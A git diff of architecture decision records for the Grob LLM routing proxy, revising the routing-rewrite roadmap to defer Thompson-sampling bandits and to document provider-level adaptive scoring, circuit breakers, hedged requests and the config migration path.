-The analogues are **explanatory**, not mystical. Every primitive has a clear engineering semantic, a bounded LoC budget, and a test plan. If the biomimetic label is distracting, read it as "Caddy + Envoy + Google tail-at-scale + Thompson sampling on top".
+The analogues are **explanatory**, not mystical. Every primitive has a clear engineering semantic, a bounded LoC budget, and a test plan. If the biomimetic label is distracting, read it as "Caddy + Envoy + Google tail-at-scale, with Thompson sampling documented only as a rejected/deferred option".
 
 ## Decision Drivers
 
 - **Kill the dual-schema class of bugs.** One system, one hierarchy, one way to express "where does this go".
 - **Separate topology from policy.** Borrowed from Envoy: physical endpoints (identity, cost, region, capabilities) are one axis; how to choose among them is a separate axis. A topology change (new provider) should not require rewriting policy.
 - **Zero-config KISS.** The minimum useful config must be ~3 lines of TOML, matching Caddy's `reverse_proxy` ergonomics. Grob ships with sane defaults for load balancing, fallback, circuit breaking, and health checks.
-- **Progressive opt-in.** Every advanced primitive (CB, health check, hedging, bandit) is off by default. A new concern = one knob. You never pay for what you don't use.
+- **Progressive opt-in.** Every advanced primitive (CB, health check, hedging) is off by default. A new concern = one knob. You never pay for what you don't use. Bandit exploration is not in the near-term opt-in set.
 - **No distributed state.** Grob stays a single binary. No Redis, no etcd, no sidecar. All routing state fits in RAM + optional persisted JSONL (see [ADR-0013](0013-storage-files-no-redb.md)).
-- **No breaking change without grace.** We are not in a vacuum. Users have configs in production. Coexistence `[[models]]`/`[[tiers]]` with the new `[[endpoints]]`/`[[policies]]` for ~6 months, explicit deprecation warnings, `grob config migrate` tooling, removal gated behind `v1.0`.
+- **No breaking change without grace.** We are not in a vacuum. Users have configs in production. Coexistence `[[models]]`/`[[tiers]]` with the new `[[endpoints]]`/`[[policies]]` requires explicit deprecation warnings, migration tooling, and removal gated behind `v1.0`.
 - **Independently shippable phases.** The RE roadmap breaks into phases RE-0..RE-8, each of which delivers standalone value. RE-1a (passive CB) is useful even without any of RE-2..RE-8. We do not ship an 8-phase big bang.
-- **Observable and testable.** Every new primitive has a metric path, a `grob stats endpoints` surface, and at minimum unit tests with deterministic fixtures.
+- **Observable and testable.** Every new primitive needs a metric path and deterministic tests. Endpoint-specific operator surfaces such as `grob stats endpoints` wait until the endpoint schema/adapter exists.
 
 ## Considered Options
 
 1. **Do nothing.** Leave `[[models]]`/`[[tiers]]` as-is. Patch B-05 (T-B05 landed this sprint) and move on.
 2. **Patch the dual schema into a hierarchy.** Keep the two tables but define a strict precedence (`tiers` > `models` > defaults) and log every override. No new schema, no migration.
 3. **Big-bang rewrite in v1.0.** Remove `[[models]]`/`[[tiers]]` in one release, ship `[[endpoints]]`/`[[policies]]`. Users migrate their config manually.
-4. **Incremental rewrite with coexistence.** Ship `[[endpoints]]`/`[[policies]]` alongside the legacy schema, deprecation warnings, `grob config migrate` tool, removal in v1.0 after ~6 months coexistence. (**Chosen.**)
+4. **Incremental rewrite with coexistence.** Ship an adapter/migration path first, then `[[endpoints]]`/`[[policies]]` alongside the legacy schema with deprecation warnings and migration tooling before removal in v1.0. (**Chosen.**)
 5. **Adopt an existing routing library / sidecar (Envoy, LiteLLM, APISIX, Portkey).** Replace Grob's routing layer with an external dependency.
 
 ## Decision Outcome
 
 **Chosen: option 4 — incremental rewrite with coexistence.**
 
-The rewrite targets a schema structured along the **topology vs policy** axis borrowed from Envoy, with ergonomics borrowed from Caddy's `reverse_proxy` directive, and a catalogue of nature-inspired primitives (passive CB, active health check, cooldown half-open, EMA stats, hedged requests, Thompson sampling) layered as **opt-in** modules.
+The rewrite targets a schema structured along the **topology vs policy** axis borrowed from Envoy, with ergonomics borrowed from Caddy's `reverse_proxy` directive, and a catalogue of nature-inspired primitives (passive CB, active health check, cooldown half-open, adaptive scoring, hedged requests) layered as **opt-in** modules. Thompson sampling remains a rejected/deferred option, not part of the current implementation catalogue.
 
 ### Principle 1 — Topology vs policy
 
@@ -114,7 +122,7 @@ This ergonomic target is directly lifted from Caddy's `reverse_proxy example.com
 
 ### Principle 3 — Nature-inspired primitives as opt-in layers
 
-Each primitive below is **standalone and opt-in**. Turning it on is a few lines of TOML. None of them is required for the baseline to function. The order below matches the implementation phases RE-1..RE-4.
+Each primitive below is **standalone and opt-in**. Turning it on is a few lines of TOML. None of them is required for the baseline to function. The order below matches the implementation phases RE-1..RE-3; former RE-4 is retained only as rejected/deferred design context.
 
 #### Passive circuit breaker (RE-1a, Caddy-inspired)
 
@@ -153,23 +161,27 @@ This is a standard half-open circuit breaker pattern (see Martin Fowler, [Circui
 
 ~100 LoC. Sprint S6 or later.
 
-#### EMA stats per-endpoint (RE-2, ant stigmergy)
+#### Adaptive scoring (RE-2, ant stigmergy)
 
-Exponential moving average of three quantities per endpoint:
+Current implementation: provider-level adaptive scoring in
+`src/security/provider_scorer.rs` (ADR-0019), tracking rolling success rate,
+latency EWMA, and recency per provider. Metrics are `grob_provider_*`.
 
-- `success_rate_ema` (decay ~1h).
-- `latency_p95_ema` (decay ~1h).
-- `cost_actual_ema` (decay ~24h; tracks live pricing drifts without full reconfig).
+Deferred target: per-endpoint EMA can track `success_rate_ema`,
+`latency_p95_ema`, and `cost_actual_ema` only after stable endpoint identities
+exist. Do not add `~/.grob/routing/endpoints.jsonl` or `grob stats endpoints`
+until ADR-0022 has an adapter/migration path.
 
-Stored in RAM, periodically persisted to `~/.grob/routing/endpoints.jsonl` (see [ADR-0013](0013-storage-files-no-redb.md)). Exposed via `grob stats endpoints`.
+The biological framing: **good paths accumulate pheromone**. Ants don't centrally decide which trail is best; each success reinforces the trail for future ants, each failure lets the trail evaporate. EMA with exponential decay is the engineering form of this. The point is not romance — it is that **online, local, per-request feedback can drive good global behaviour without a central coordinator**. In the current tree this is provider-level adaptive scoring (ADR-0019), not endpoint-level EMA.
 
-The biological framing: **good paths accumulate pheromone**. Ants don't centrally decide which trail is best; each success reinforces the trail for future ants, each failure lets the trail evaporate. EMA with exponential decay is the engineering form of this. The point is not romance — it is that **online, local, per-request feedback can drive good global behaviour without a central coordinator**. This is what lets RE-4 (bandit) work without a database.
-
-~300 LoC. v0.39.
+Provider-level v1 is already shipped. Endpoint-level RE-2 remains deferred.
 
 #### Hedged requests (RE-3, fish shoaling / Google Tail at Scale)
 
-When a request to the primary endpoint exceeds the endpoint's `latency_p95_ema` (or a configured `hedging.p95_trigger_factor`), Grob fires a **second** request to the next-best endpoint. Whichever returns first wins; the other is cancelled.
+Target design: when a request to the primary provider/endpoint exceeds a fixed
+threshold or the future endpoint's `latency_p95_ema`, Grob fires a **second**
+request to the next-best eligible provider/endpoint. Whichever returns first
+wins; the other is cancelled and audited under ADR-0020's spend protocol.
 
 Core reference: Dean & Barroso, [The Tail at Scale](https://research.google/pubs/pub40801/), CACM 2013. The empirical result: hedging on p95 adds ~5% request amplification but reduces p99 latency by up to 10×. Cost `+50%` punctually ≪ cost of a timeout `+300%`. The biological analogue (redundant swimmers in a fish shoal) is illustrative; the engineering argument stands on its own.
 
@@ -177,19 +189,27 @@ Configuration: `hedging = { p95_trigger = true, p95_factor = 1.5 }`. Zone: `src/
 
 ~250 LoC. v0.39.
 
-#### Weighted bandit / Thompson sampling (RE-4, scout bees)
+#### Weighted bandit / Thompson sampling (rejected/deferred, scout bees)
 
-Replace the static `weight = 5` with a Beta(α, β) posterior per endpoint on its success rate. On each request:
+Thompson sampling remains design context, not an implementation phase. It would
+replace deterministic ordering with probabilistic exploration: sample a
+posterior for each endpoint, pick the highest draw, and update the posterior
+after the request.
 
-1. **Sample** a success-rate from each endpoint's posterior.
-2. **Pick** the endpoint with the highest sampled value.
-3. **Update** α on success, β on failure.
+That is useful in ad-serving-style optimization, but it conflicts with Grob's
+current constraints:
 
-This is standard Thompson sampling ([Russo et al., "A Tutorial on Thompson Sampling"](https://arxiv.org/abs/1707.02038)). The 5% ε-greedy knob forces occasional exploration to prevent lock-in on a locally-good endpoint when a genuinely-better one has zero sample.
+- The current schema has provider mappings, not stable endpoint identities.
+- Security-prevails deployments need predictable, auditable routing decisions.
+- Exploration can spend money on a worse provider by design, so it needs an
+  explicit spend reservation and audit protocol before it is acceptable.
+- ADR-0019 already provides a simpler provider-level scorer that handles the
+  immediate failure-recovery problem.
 
-The biological framing (scout bees exploring unknown nectar sources while foragers exploit the known good patches) is explanatory — the underlying math is a multi-armed bandit, widely-studied, battle-tested in ad serving and A/B testing.
-
-~500 LoC. v0.40. This is the "last heavy phase" before the schema refactor RE-5.
+If this is revisited, it needs a new ADR after ADR-0022 has an internal
+endpoint adapter and after hedging/spend audit semantics are proven. It should
+not be implemented as a quick `lb_policy = "bandit"` patch on the legacy
+`[[models]]` schema.
 
 ### Principle 4 — Migration path with 6-month coexistence
 
@@ -200,8 +220,8 @@ flowchart LR
     v037[v0.37<br/>RE-0 ADR]:::current
     v038[v0.38<br/>RE-1 CB + HC<br/>legacy still works]
     v039[v0.39<br/>RE-2 EMA + RE-3 hedge<br/>legacy still works]
-    v040[v0.40<br/>RE-4 bandit<br/>legacy still works]
-    v041[v0.41<br/>RE-5 new schema shipped<br/>coexistence begins]:::milestone
+    v040[v0.40<br/>RE-4 removed/deferred<br/>legacy still works]
+    v041[v0.41<br/>RE-5 schema adapter/migration<br/>coexistence begins]:::milestone
     v042[v0.42-v0.44<br/>coexistence<br/>warning log on startup<br/>if [[models]] detected]
     v045[v0.45<br/>legacy_routing feature flag<br/>defaults to false<br/>explicit opt-in required]
     v1[v1.0<br/>legacy removed]:::breaking
@@ -217,19 +237,19 @@ Key milestones:
 
 1. **v0.37 (this ADR, RE-0).** No code change to `[[models]]`/`[[tiers]]`. New routing concepts documented, no schema change yet. T-B05 (already landed in S5) patches the silent-override bug so coexistence is safe.
 2. **v0.38 (RE-1a + RE-1b).** Passive CB and active health checks land in the new `src/routing/` module. Wired into the existing dispatch layer (`src/server/dispatch/mod.rs`) without changing the schema. Both primitives are off by default. **Legacy schema untouched.**
-3. **v0.39 (RE-2 + RE-3).** EMA stats and hedged requests. Still no schema change. The existing `[[models]]` entries get implicit `latency_p95_ema` / `success_rate_ema` keyed by `(provider, model)`.
-4. **v0.40 (RE-4).** Thompson sampling. Opt-in via a new `lb_policy = "bandit"` value on existing `[[tiers]]` (or the new `[[policies]]` once RE-5 lands — whichever ships first).
-5. **v0.41 (RE-5).** `[[endpoints]]` and `[[policies]]` ship. **Both schemas are read** by the config loader. If both are present, a warning is logged and `[[endpoints]]` wins. `grob config migrate` generates a new-style config from a legacy one. No runtime behaviour change if the user does not touch their config.
+3. **v0.39 (RE-2 + RE-3).** Provider-level adaptive scoring is the delivered v1; hedged requests remain proposed until spend reservation, cancellation billing, and audit semantics are documented and tested.
+4. **v0.40 (former RE-4).** Thompson sampling is removed from the near-term roadmap. No `lb_policy = "bandit"` is added to the legacy schema.
+5. **v0.41 (RE-5).** `[[endpoints]]` and `[[policies]]` start as an adapter/migration path, not a cut-over. The read-only adapter exists in `src/routing/endpoints.rs`; both schemas may be read by the config loader only once golden-file migration tests and clear startup warnings exist.
 6. **v0.42–v0.44 (coexistence).** Each startup log emits:
 
    ```
    WARN routing: legacy [[models]]/[[tiers]] schema detected.
-        Run `grob config migrate` to generate an [[endpoints]]/[[policies]] config.
+       Run the routing migration command to generate an [[endpoints]]/[[policies]] config.
         Legacy schema support will be removed in v1.0.
    ```
 
 7. **v0.45 (opt-in legacy).** The legacy schema is gated behind `[features] legacy_routing = false` (default). Users who have not migrated hit a startup error that tells them exactly what to do. This is the "loud" phase — we want users to know.
-8. **v1.0 (hard removal).** `legacy_routing` feature flag removed. Legacy code paths deleted. `grob config migrate` kept for one more version as a convenience, then removed in v1.1.
+8. **v1.0 (hard removal).** `legacy_routing` feature flag removed. Legacy code paths deleted. The routing migration command is kept for one more version as a convenience, then removed in v1.1.
 
 The 6-month coexistence window (≈ v0.41 → v0.45 at Grob's current release cadence of ~1 minor/month) is a **deliberate choice**, not a compromise. It is long enough for enterprise users on quarterly-upgrade cycles to pick up at least one warning-only release before the opt-in phase.
 
@@ -301,7 +321,7 @@ The alternative — skip T-B05 and jump straight to RE-5 — was considered and 
 - Value ships in every RE-* phase independently.
 - Users migrate on their own schedule within the coexistence window.
 - Coexistence code is bounded (~200 LoC in `src/cli/config.rs` during v0.41–v0.45) and has a hard removal date.
-- `grob config migrate` is tested in production against real configs before v1.0.
+- The routing migration command is tested against real configs before v1.0.
 
 **Cons:**
 
@@ -336,9 +356,9 @@ Rejected on architectural grounds, not on quality of the external libraries.
 - **Envoy-shaped mental model.** Every experienced SRE already knows topology vs policy. No novel concepts to learn.
 - **Caddy-shaped ergonomics.** A Grob user who has used Caddy will write a correct config in 30 seconds.
 - **Each RE phase ships independently.** RE-1a (CB) is useful without any of the others. This is a real reduction in blast radius per release.
-- **Bio-inspired framing** gives the project a coherent narrative for a hard problem. It is not just decoration — each primitive has an engineering citation (Caddy, Envoy, Google Tail at Scale, Thompson sampling).
+- **Bio-inspired framing** gives the project a coherent narrative for a hard problem. It is not just decoration — each accepted primitive has an engineering citation (Caddy, Envoy, Google Tail at Scale), while Thompson sampling is kept as rejected/deferred context.
 - **6-month coexistence** is humane for users with production configs.
-- **`grob config migrate`** becomes a pattern we can reuse for future schema changes.
+- **A routing migration command** becomes a pattern we can reuse for future schema changes.
 
 ### Negative
 
@@ -346,15 +366,15 @@ Rejected on architectural grounds, not on quality of the external libraries.
 - **Coexistence code in `src/cli/config.rs`** for ~6 months. Bounded but non-zero maintenance cost.
 - **Two docs sections** during coexistence (legacy + new). We mitigate with a prominent banner on legacy pages.
 - **Risk of feature creep.** Each RE-* phase must stay scoped. The roadmap already defers RE-6 (expression objective) and RE-7 (CEL/Rego) explicitly because they are not needed for 95% of users.
-- **Risk of "bio-inspired label" being perceived as marketing.** Mitigated by citing the engineering sources (Caddy, Envoy, Dean & Barroso 2013, Thompson sampling tutorial) in every phase ADR.
+- **Risk of "bio-inspired label" being perceived as marketing.** Mitigated by citing the engineering sources (Caddy, Envoy, Dean & Barroso 2013) in every active phase ADR and keeping Thompson sampling clearly marked as rejected/deferred.
 
 ### Confirmation
 
 Compliance with this ADR will be verified by:
 
-1. **Per-phase ADRs** (0019 for RE-1a CB, 0020 for RE-1b HC, etc.) — each RE-* phase lands with its own ADR referencing this one.
+1. **Per-phase ADRs / status notes** — ADR-0019 documents provider scoring v1, ADR-0020 documents hedging as proposed, and ADR-0022 documents the endpoint-schema target plus the read-only adapter. Circuit breaker and health-check modules are already present and should get a follow-up ADR/status note if their shipped behavior becomes more than local implementation detail.
 2. **Tests** at every phase — unit tests for each primitive, integration tests for the coexistence loader in v0.41.
-3. **`grob config migrate` golden-file tests** — a fixture directory of legacy configs, each with an expected new-schema output.
+3. **Routing migration golden-file tests** — a fixture directory of legacy configs, each with an expected new-schema output.
 4. **Startup warning log** — explicit assertion in CI that v0.42+ logs the deprecation warning when `[[models]]` is present.
 5. **v1.0 grep check** — CI job that fails if any reference to `[[models]]` or `[[tiers]]` remains in the codebase after the v1.0 removal milestone.
 
@@ -363,7 +383,7 @@ Compliance with this ADR will be verified by:
 ### Internal references
 
 - [ADR-0003 — Regex routing engine](0003-regex-routing-engine.md) — the current routing model that this ADR supersedes for the endpoint-selection layer. The regex task-type classification in `src/routing/classify/mod.rs` is orthogonal and stays.
-- [ADR-0013 — Storage on atomic files + append-only journal](0013-storage-files-no-redb.md) — persistence substrate for EMA stats and CB state.
+- [ADR-0013 — Storage on atomic files + append-only journal](0013-storage-files-no-redb.md) — persistence substrate for any future endpoint-level EMA stats and CB state.
 - [ADR-0014 — Mesh networking WireGuard KISS](0014-mesh-wireguard-kiss.md) — the single-binary / no-sidecar constraint that forces an in-process routing layer.
 - [ADR-0016 — Decision Tokens](0016-decision-tokens-transparent-routing.md) — routing decisions emit tokens; the new schema does not change token format.
 - [ADR-0017 — Sokolsky LogBackend](0017-sokolsky-log-backend.md) — routing decisions go to the audit plane; unchanged by this ADR.
@@ -373,7 +393,7 @@ Compliance with this ADR will be verified by:
 - Matt Klein, [Envoy's architectural model](https://www.envoyproxy.io/docs/envoy/latest/intro/arch_overview/intro/intro) — clusters (topology) vs listeners/filters (policy).
 - Matt Holt, [Caddy `reverse_proxy` directive](https://caddyserver.com/docs/caddyfile/directives/reverse_proxy) — the ergonomic benchmark for this ADR. Every example we ship should be benchmarked against Caddy's equivalent in lines of config.
 - Jeffrey Dean & Luiz André Barroso, [The Tail at Scale](https://research.google/pubs/pub40801/), *Communications of the ACM*, Vol. 56, No. 2, 2013 — the canonical reference for hedged requests.
-- Daniel J. Russo, Benjamin Van Roy, Abbas Kazerouni, Ian Osband & Zheng Wen, [A Tutorial on Thompson Sampling](https://arxiv.org/abs/1707.02038), *Foundations and Trends in Machine Learning*, 2018 — Thompson sampling reference.
+- Daniel J. Russo, Benjamin Van Roy, Abbas Kazerouni, Ian Osband & Zheng Wen, [A Tutorial on Thompson Sampling](https://arxiv.org/abs/1707.02038), *Foundations and Trends in Machine Learning*, 2018 — retained as rejected/deferred design context, not an implementation dependency.
 - Martin Fowler, [CircuitBreaker](https://martinfowler.com/bliki/CircuitBreaker.html) — the half-open state pattern.
 - Leslie Lamport, [The Temporal Logic of Actions](https://lamport.azurewebsites.net/pubs/lamport-actions.pdf) — state-machine framing used informally to argue the CB primitive has no implicit states.
 - Marco Dorigo & Thomas Stützle, *Ant Colony Optimization*, MIT Press, 2004 — stigmergy as a distributed optimisation primitive.
@@ -450,10 +470,10 @@ flowchart TD
     RE1a["RE-1a — Passive CB<br/>~200 LoC<br/>v0.38"]
     RE1b["RE-1b — Active HC<br/>~150 LoC<br/>v0.38"]
     RE1c["RE-1c — Cooldown +<br/>half-open probes<br/>~100 LoC<br/>v0.39"]
-    RE2["RE-2 — EMA stats<br/>~300 LoC<br/>v0.39"]
+    RE2["RE-2 — Provider scoring v1<br/>shipped; endpoint EMA deferred"]
     RE3["RE-3 — Hedged requests<br/>~250 LoC<br/>v0.39"]
-    RE4["RE-4 — Thompson bandit<br/>~500 LoC<br/>v0.40"]
-    RE5["RE-5 — Schema refactor<br/>[[endpoints]] + [[policies]]<br/>~700 LoC<br/>v0.41"]:::milestone
+    RE4["RE-4 — Thompson bandit<br/>rejected/deferred"]:::deferred
+    RE5["RE-5 — Schema adapter/migration<br/>[[endpoints]] + [[policies]]<br/>~700 LoC<br/>v0.41+"]:::milestone
     RE6["RE-6 — Expression DSL<br/>(opt-in experts)<br/>~300 LoC<br/>v0.50+"]:::deferred
     RE7["RE-7 — CEL / Rego selector<br/>(opt-in, reporté)<br/>~1500 LoC<br/>v0.50+"]:::deferred
     RE8["RE-8 — Deprecation removal<br/>[[models]] / [[tiers]]<br/>XS<br/>v1.0"]:::breaking
@@ -463,8 +483,8 @@ flowchart TD
     RE1a --> RE1c
     RE1b --> RE2
     RE2 --> RE3
-    RE2 --> RE4
-    RE4 --> RE5
+    RE2 -. no near-term bandit .-> RE4
+    RE2 --> RE5
     RE5 --> RE6
     RE6 --> RE7
     RE5 --> RE8
@@ -483,14 +503,14 @@ flowchart TD
 | RE-1a | ~200 | v0.38 | S5 / S6 | yes |
 | RE-1b | ~150 | v0.38 | S5 / S6 | yes |
 | RE-1c | ~100 | v0.39 | S7 | no |
-| RE-2 | ~300 | v0.39 | S7 | yes |
+| RE-2 | shipped v1 / endpoint deferred | current | done for provider scoring | no |
 | RE-3 | ~250 | v0.39 | S7 | no |
-| RE-4 | ~500 | v0.40 | S8 | yes |
-| RE-5 | ~700 | v0.41 | S9 | yes (blocks v1.0) |
+| RE-4 | deferred | none | none | no |
+| RE-5 | ~700 | v0.41+ | S9+ | yes (blocks v1.0) |
 | RE-6 | ~300 | v0.50+ | deferred | no |
 | RE-7 | ~1500 | v0.50+ | deferred | no |
 | RE-8 | XS | v1.0 | ~S15 | yes |
-| **Total shipping** | **~2500** | **v0.37 → v1.0** | **~9 months** | |
+| **Total shipping** | **~2000** | **v0.37 -> v1.0** | **~9 months** | |
 
 Each phase is independently shippable. Stopping the project at any point after RE-1 leaves Grob strictly better off than today.
 
@@ -575,31 +595,21 @@ Properties:
 - `probe()` is a single HTTP call; no retries, no backoff. If the user wants retries they wrap the URI with a proxy that does retries.
 - Combined "is the endpoint up" check is `cb.is_up() && hc.last_ok.load()`.
 
-#### EMA stats (RE-2)
+#### Adaptive provider scoring (RE-2)
 
-```rust
-// src/routing/stats.rs
-pub struct EmaStats {
-    success_rate: AtomicF64,
-    latency_p95_ms: AtomicF64,
-    alpha: f64, // smoothing factor, e.g. 2 / (n + 1) where n is the effective window
-}
-
-impl EmaStats {
-    pub fn record(&self, success: bool, latency_ms: f64) {
-        let s = if success { 1.0 } else { 0.0 };
-        self.success_rate.fetch_ema(s, self.alpha);
-        self.latency_p95_ms.fetch_ema(latency_ms, self.alpha);
-    }
-}
-```
-
-(`fetch_ema` is a CAS loop. We can use a crate or implement inline — the unit is ~30 LoC.)
+The shipped v1 is `src/security/provider_scorer.rs`, not
+`src/routing/stats.rs`. It stores one provider score with a rolling success-rate
+window, latency EWMA, confidence decay, and circuit-breaker overlay. See
+ADR-0019 for formula and tests.
 
 Properties:
 
-- Constant-memory per endpoint (three f64 atomics).
-- No histograms, no reservoir sampling. The p95 is approximate — the EMA of the observed latencies weighted by α. Good enough for routing decisions; not good enough for SLO reporting (use Sokolsky for that).
+- Constant-memory per provider.
+- No endpoint identity required.
+- Metrics are `grob_provider_score`, `grob_provider_latency_ewma_ms`, and
+  `grob_provider_success_rate`.
+- Endpoint-level EMA is deferred until ADR-0022 has a stable adapter/migration
+  path.
 
 #### Hedged requests (RE-3)
 
@@ -632,52 +642,21 @@ Properties:
 - Whichever returns first wins. The other future is dropped (tokio cancels it).
 - Cost amplification is bounded by `p(primary > p95) ≈ 5%`, so hedge cost is `~5% × secondary_cost`.
 
-#### Thompson sampling (RE-4)
+#### Thompson sampling (former RE-4)
 
-```rust
-// src/routing/bandit.rs
-pub struct Beta {
-    alpha: AtomicF64, // successes + 1
-    beta: AtomicF64,  // failures + 1
-}
-
-impl Beta {
-    pub fn sample(&self, rng: &mut impl Rng) -> f64 {
-        // NOTE: illustrative snippet; the real implementation threads a
-        // recoverable error so a pathological (alpha, beta) pair cannot
-        // panic the dispatch hot path.
-        let a = self.alpha.load(Ordering::Relaxed).max(f64::EPSILON);
-        let b = self.beta.load(Ordering::Relaxed).max(f64::EPSILON);
-        rand_distr::Beta::new(a, b)
-            .map(|d| d.sample(rng))
-            .unwrap_or(0.5)
-    }
-}
-
-pub fn pick<'a>(endpoints: &'a [Endpoint], rng: &mut impl Rng) -> Option<&'a Endpoint> {
-    endpoints.iter().max_by(|a, b| {
-        a.beta
-            .sample(rng)
-            .partial_cmp(&b.beta.sample(rng))
-            .unwrap_or(std::cmp::Ordering::Equal)
-    })
-}
-```
-
-Properties:
-
-- One sample per endpoint per request. For 10 endpoints, ~10 Beta samples = a few microseconds with `rand_distr`.
-- Naturally handles exploration (a new endpoint with Beta(1,1) has mean 0.5 and high variance → sometimes samples high → gets tried).
-- ε-greedy knob (default 5%) forces exploration even for mature endpoints: with probability ε, pick uniformly at random.
+No implementation sketch is retained for Thompson sampling. Keeping pseudo-code
+for `src/routing/bandit.rs` made the ADR read as an implementation plan even
+though the primitive is rejected/deferred. If revisited, it needs a new ADR with
+endpoint identity, spend reservation, audit, and deterministic test constraints.
 
 ### Glossary — biomimetic labels vs engineering primitives
 
 | Biomimetic label | Engineering primitive | Where it lives in Grob |
 |---|---|---|
 | Mammalian homeostasis | Half-open circuit breaker with cooldown | `src/routing/circuit_breaker.rs` (RE-1c) |
-| Ant stigmergy / pheromone | Exponential moving average per endpoint | `src/routing/stats.rs` (RE-2) |
+| Ant stigmergy / pheromone | Adaptive score from recent success/latency | `src/security/provider_scorer.rs` today; endpoint-level target deferred |
 | Fish shoaling / redundant swimmers | Hedged requests on p95 trigger | `src/server/dispatch/hedged.rs` (RE-3) |
-| Scout bees / exploration | Thompson sampling with ε-greedy exploration | `src/routing/bandit.rs` (RE-4) |
+| Scout bees / exploration | Thompson sampling with epsilon-greedy exploration | Rejected/deferred; no `src/routing/bandit.rs` |
 | Mycelium network | (Not used — misleading. Distributed consensus is not required here.) | — |
 | Swarm intelligence | (Not used — too vague. Every specific pattern above is named precisely.) | — |
 
@@ -707,7 +686,7 @@ match = { header = "x-env", value = "paper" }
 override = { provider = "deepseek", model = "deepseek-v3.2" }
 ```
 
-After (v0.41+ `~/.grob/config.toml`, after `grob config migrate`):
+After (v0.41+ `~/.grob/config.toml`, after the routing migration command):
 
 ```toml
 # Topology — the physical endpoints we can talk to.
@@ -779,7 +758,7 @@ The fields expected on `[[policies]]`:
 | `match` | string | **required** | Glob on the request model name (`"claude-sonnet-*"`, `"*"`). |
 | `when` | table | `{}` | Extra predicates: `region`, `capability`, `header`, `tenant`. |
 | `endpoints` | array of endpoint id | inferred | If omitted, all endpoints whose model matches `match`. |
-| `lb_policy` | enum | `"random"` | One of `random`, `round_robin`, `first`, `weighted`, `cheapest`, `fastest`, `bandit`. |
+| `lb_policy` | enum | `"random"` | One of `random`, `round_robin`, `first`, `weighted`, `cheapest`, `fastest`. |
 | `weights` | table `{ id = number }` | — | Required only when `lb_policy = "weighted"`. |
 | `fallback` | policy name | — | Nested fallback, Caddy-style. |
 | `fallback_trigger_codes` | array of int | `[429, 500, 502, 503, 504]` | HTTP codes that trigger fallback. |
@@ -793,9 +772,7 @@ The `lb_policy` values:
 - `first` — always the first endpoint in the list. Degenerate fallback.
 - `weighted` — classic weighted random, requires `weights`.
 - `cheapest` — pick the endpoint with lowest `cost_in + cost_out`.
-- `fastest` — pick the endpoint with lowest `latency_p95_ema` (requires RE-2).
-- `bandit` — Thompson sampling (requires RE-2 + RE-4).
-
+- `fastest` — pick the endpoint with lowest `latency_p95_ema` (requires deferred endpoint-level RE-2).
 A future `expression` policy (RE-6) would allow arbitrary arithmetic on fields like `0.6 * cost_in + 0.4 * latency_p95_ms`. Deferred; not in scope for this ADR.
 
 ### Why not just "config as code"?
@@ -820,7 +797,7 @@ This is a judgement call, not a mathematical derivation. A future ADR can shorte
 
 ### Open questions (not blocking this ADR)
 
-- **Endpoint identity across restarts.** EMA stats for endpoint `or-m25` need to survive a restart. How do we key the persisted JSONL — by `id`, by `(provider, model)`, by both? Decision deferred to RE-2 ADR.
+- **Endpoint identity across restarts.** Endpoint-level EMA stats need stable IDs before persistence makes sense. The keying decision is deferred to the ADR-0022 adapter/migration work, not to the provider-level scorer.
 - **Cost inference robustness.** The OpenRouter pricing API is rate-limited. What is the fallback if the lookup fails at startup? Probably: cache-first, hard-coded defaults for known providers, opt-in override in config. Decision deferred to RE-5 ADR.
 - **Policy ordering for overlapping matches.** If two `[[policies]]` both match a request, which wins? Current proposal: first match in TOML order, with a startup warning if overlaps detected. To be confirmed in RE-5 ADR.
 - **Hedging cost accounting.** A hedged request that loses the race is still billed by the provider. How do we surface this in `grob spend`? Decision deferred to RE-3 ADR.

--- a/docs/decisions/0019-ema-stigmergy-endpoint-scoring.md
+++ b/docs/decisions/0019-ema-stigmergy-endpoint-scoring.md
@@ -1,188 +1,163 @@
 ---
-status: proposed
+status: accepted
 date: 2026-04-28
 deciders: [azerozero]
 consulted: []
 informed: []
 supersedes: []
-related: [ADR-0018]
+related: [ADR-0018, ADR-0020, ADR-0022]
 ---
 
-# ADR-0019: EMA Stigmergy — Adaptive Endpoint Health Scoring
+# ADR-0019: Adaptive Provider Scoring v1 — Provider-Level Score Before `[[endpoints]]`
 
 ## Implementation status
 
-Adaptive scoring now lives in the security layer as `src/security/provider_scorer.rs`, configured by `[security] adaptive_scoring` and the `scoring_*` knobs in `src/cli/config/security.rs`. The earlier `[router.ema]` examples and `src/routing/ema.rs` path below are historical design notes, not the current operator-facing schema.
+Adaptive scoring is implemented as a provider-level scorer in
+`src/security/provider_scorer.rs`, initialized from
+`[security] adaptive_scoring` and the `scoring_*` fields in
+`src/cli/config/security.rs`.
+
+This ADR is **not** a delivered per-endpoint EMA under `[router.ema]`.
+There is no `src/routing/ema.rs`, no `[[endpoints]]` top-level schema, and no
+`grob_routing_endpoint_*` metric family in the current tree. The live metrics
+are:
+
+| Metric | Labels | Meaning |
+|---|---|---|
+| `grob_provider_score` | `provider` | Composite provider score |
+| `grob_provider_latency_ewma_ms` | `provider` | Provider latency EWMA |
+| `grob_provider_success_rate` | `provider` | Rolling provider success rate |
+
+The `scoring_persist` config field is parsed but score persistence is not wired
+yet; current scores are in-memory process state.
 
 ## Context and Problem Statement
 
-Grob currently routes via static priority chains in `[[models.mappings]]`. When a high-priority endpoint degrades — slow responses, sporadic 429s, regional outages — grob keeps hammering it on every request until the operator manually edits the config and reloads.
+Grob routes through logical `[[models]]` entries with priority-ordered provider
+mappings. That schema does not yet expose stable endpoint IDs. A full
+per-endpoint EMA therefore has no natural key, no migration path, and no clear
+operator surface until ADR-0022's `[[endpoints]]` / `[[policies]]` migration is
+ready.
 
-In practice this means:
-
-- A 5-minute DeepSeek hiccup causes ~300 retries-then-fallbacks for an active Claude Code session before any human notices.
-- An endpoint that has been struggling for an hour stays at p1 because no one is watching the metrics.
-- Conversely, an endpoint that was down yesterday and is fully healthy today stays artificially deprioritized in someone's manually-edited config until they remember to revert the change.
-
-The fix is **adaptive scoring**: each endpoint accumulates a health score from recent observed signals (success rate, latency percentiles, 429 rate) and the score gradually fades back to neutral over time. Inspired by ant pheromone trails — high-traffic-success paths leave stronger trails; failures evaporate without trace.
+The immediate operational need is still real: avoid repeatedly trying a provider
+that is failing, slow, or in a half-open circuit-breaker state when another
+configured provider can serve the same logical model.
 
 ## Decision Drivers
 
-- **Recovery from transient provider issues without operator intervention** (primary).
